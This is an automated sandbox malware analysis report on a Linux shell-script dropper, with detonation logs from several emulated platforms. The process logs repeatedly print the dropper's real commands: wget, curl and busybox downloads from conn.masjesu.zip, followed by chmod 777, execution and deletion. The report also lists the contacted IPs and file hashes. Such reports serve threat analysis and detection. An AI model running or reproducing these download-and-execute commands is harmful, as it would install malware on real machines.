Malware Analysis Report

2025-05-28 20:51

Sample ID 241021-b25qyascla
Target b59925aedbe7efc35a7f09ff6f8e186a7a09f662bfb6d538f88de221f280fc30.sh
SHA256 b59925aedbe7efc35a7f09ff6f8e186a7a09f662bfb6d538f88de221f280fc30
Tags
defense_evasion discovery antivm
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

b59925aedbe7efc35a7f09ff6f8e186a7a09f662bfb6d538f88de221f280fc30

Threat Level: Shows suspicious behavior

The file b59925aedbe7efc35a7f09ff6f8e186a7a09f662bfb6d538f88de221f280fc30.sh was found to be: Shows suspicious behavior.

Malicious Activity Summary

defense_evasion discovery antivm

File and Directory Permissions Modification

Executes dropped EXE

Checks CPU configuration

System Network Configuration Discovery

Writes file to tmp directory

Reads runtime system information

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-21 01:39

Signatures

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-10-21 01:39

Reported

2024-10-21 01:41

Platform

debian9-mipsel-20240729-en

Max time kernel

149s

Max time network

151s

Command Line

[/tmp/b59925aedbe7efc35a7f09ff6f8e186a7a09f662bfb6d538f88de221f280fc30.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c /tmp/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c N/A
N/A /tmp/LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F /tmp/LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F N/A
N/A /tmp/rpPbXQSsqwMYb1v7YyxwxMStI947794Fs6 /tmp/rpPbXQSsqwMYb1v7YyxwxMStI947794Fs6 N/A
N/A /tmp/LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt /tmp/LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt N/A
N/A /tmp/PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL /tmp/PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL N/A
N/A /tmp/lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI /tmp/lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI N/A
N/A /tmp/MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH /tmp/MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH N/A
N/A /tmp/5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG /tmp/5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG N/A
N/A /tmp/PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx /tmp/PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx N/A
N/A /tmp/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB /tmp/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB N/A
N/A /tmp/z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW /tmp/z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW N/A
N/A /tmp/ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW /tmp/ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW N/A
N/A /tmp/Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst /tmp/Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst N/A
N/A /tmp/8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI /tmp/8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI N/A
N/A /tmp/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB /tmp/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F /usr/bin/curl N/A
File opened for modification /tmp/lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI /usr/bin/curl N/A
File opened for modification /tmp/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB /usr/bin/curl N/A
File opened for modification /tmp/8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI /usr/bin/curl N/A
File opened for modification /tmp/rpPbXQSsqwMYb1v7YyxwxMStI947794Fs6 /usr/bin/curl N/A
File opened for modification /tmp/z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW /usr/bin/curl N/A
File opened for modification /tmp/ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW /usr/bin/curl N/A
File opened for modification /tmp/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c /usr/bin/curl N/A
File opened for modification /tmp/LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt /usr/bin/curl N/A
File opened for modification /tmp/PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx /usr/bin/curl N/A
File opened for modification /tmp/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB /usr/bin/curl N/A
File opened for modification /tmp/Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst /usr/bin/curl N/A
File opened for modification /tmp/PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL /usr/bin/curl N/A
File opened for modification /tmp/MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH /usr/bin/curl N/A
File opened for modification /tmp/5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG /usr/bin/curl N/A

Processes

/tmp/b59925aedbe7efc35a7f09ff6f8e186a7a09f662bfb6d538f88de221f280fc30.sh

[/tmp/b59925aedbe7efc35a7f09ff6f8e186a7a09f662bfb6d538f88de221f280fc30.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c]

/bin/chmod

[chmod 777 T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c]

/tmp/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c

[./T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c]

/bin/rm

[rm T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F]

/bin/chmod

[chmod 777 LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F]

/tmp/LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F

[./LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F]

/bin/rm

[rm LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/rpPbXQSsqwMYb1v7YyxwxMStI947794Fs6]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/rpPbXQSsqwMYb1v7YyxwxMStI947794Fs6]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/rpPbXQSsqwMYb1v7YyxwxMStI947794Fs6]

/bin/chmod

[chmod 777 rpPbXQSsqwMYb1v7YyxwxMStI947794Fs6]

/tmp/rpPbXQSsqwMYb1v7YyxwxMStI947794Fs6

[./rpPbXQSsqwMYb1v7YyxwxMStI947794Fs6]

/bin/rm

[rm rpPbXQSsqwMYb1v7YyxwxMStI947794Fs6]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt]

/bin/chmod

[chmod 777 LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt]

/tmp/LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt

[./LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt]

/bin/rm

[rm LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL]

/bin/chmod

[chmod 777 PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL]

/tmp/PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL

[./PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL]

/bin/rm

[rm PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI]

/bin/chmod

[chmod 777 lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI]

/tmp/lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI

[./lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI]

/bin/rm

[rm lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH]

/bin/chmod

[chmod 777 MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH]

/tmp/MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH

[./MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH]

/bin/rm

[rm MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG]

/bin/chmod

[chmod 777 5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG]

/tmp/5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG

[./5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG]

/bin/rm

[rm 5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx]

/bin/chmod

[chmod 777 PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx]

/tmp/PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx

[./PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx]

/bin/rm

[rm PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB]

/bin/chmod

[chmod 777 JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB]

/tmp/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB

[./JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB]

/bin/rm

[rm JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW]

/bin/chmod

[chmod 777 z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW]

/tmp/z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW

[./z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW]

/bin/rm

[rm z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW]

/bin/chmod

[chmod 777 ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW]

/tmp/ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW

[./ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW]

/bin/rm

[rm ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst]

/bin/chmod

[chmod 777 Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst]

/tmp/Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst

[./Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst]

/bin/rm

[rm Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI]

/bin/chmod

[chmod 777 8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI]

/tmp/8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI

[./8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI]

/bin/rm

[rm 8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB]

/bin/chmod

[chmod 777 JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB]

/tmp/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB

[./JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB]

/bin/rm

[rm JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp

Files

/tmp/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

/tmp/LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt

MD5 546071c6a6aeff34580b4d1a9b35a7c3
SHA1 dc2de298837a86d3bc86e8a328411229d9eccdb6
SHA256 2d1255033a3f5cde3fb430b15d84ad95c1d7d37b25132cd3dcca7c30963e9f12
SHA512 207f333daf98fe653f4f661defd86651cbb50e3482511769d0558d2fd80ce107ec6a519424e05107740a802b444b62445901788d80dde4e8dbc8ee116d5b9be7

/tmp/PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL

MD5 e1732e70f015e99d14dff1eeeaec9966
SHA1 c28358cd15b9a0bea63c5b2ed0c9b8d5cb006113
SHA256 6de94db8afc535ef95ba6c6290317d20e50312c146186cb86a4210770c1a741e
SHA512 6ac4f83ce675f8a7855c18eea51c654f19e66bfa335a5125d06ceb4293ecef3a6a12a4e57809e9531dd13b83e1d591e476973e88094fa361c0847dbdeb5923a7

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-21 01:39

Reported

2024-10-21 01:41

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

148s

Max time network

129s

Command Line

[/tmp/b59925aedbe7efc35a7f09ff6f8e186a7a09f662bfb6d538f88de221f280fc30.sh]

Signatures

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A

Processes

/tmp/b59925aedbe7efc35a7f09ff6f8e186a7a09f662bfb6d538f88de221f280fc30.sh

[/tmp/b59925aedbe7efc35a7f09ff6f8e186a7a09f662bfb6d538f88de221f280fc30.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp
US 151.101.193.91:443 tcp
GB 89.187.167.3:443 tcp
GB 185.125.188.62:443 tcp
GB 185.125.188.62:443 tcp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-21 01:39

Reported

2024-10-21 01:41

Platform

debian9-armhf-20240729-en

Max time kernel

149s

Max time network

3s

Command Line

[/tmp/b59925aedbe7efc35a7f09ff6f8e186a7a09f662bfb6d538f88de221f280fc30.sh]

Signatures

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A

Processes

/tmp/b59925aedbe7efc35a7f09ff6f8e186a7a09f662bfb6d538f88de221f280fc30.sh

[/tmp/b59925aedbe7efc35a7f09ff6f8e186a7a09f662bfb6d538f88de221f280fc30.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
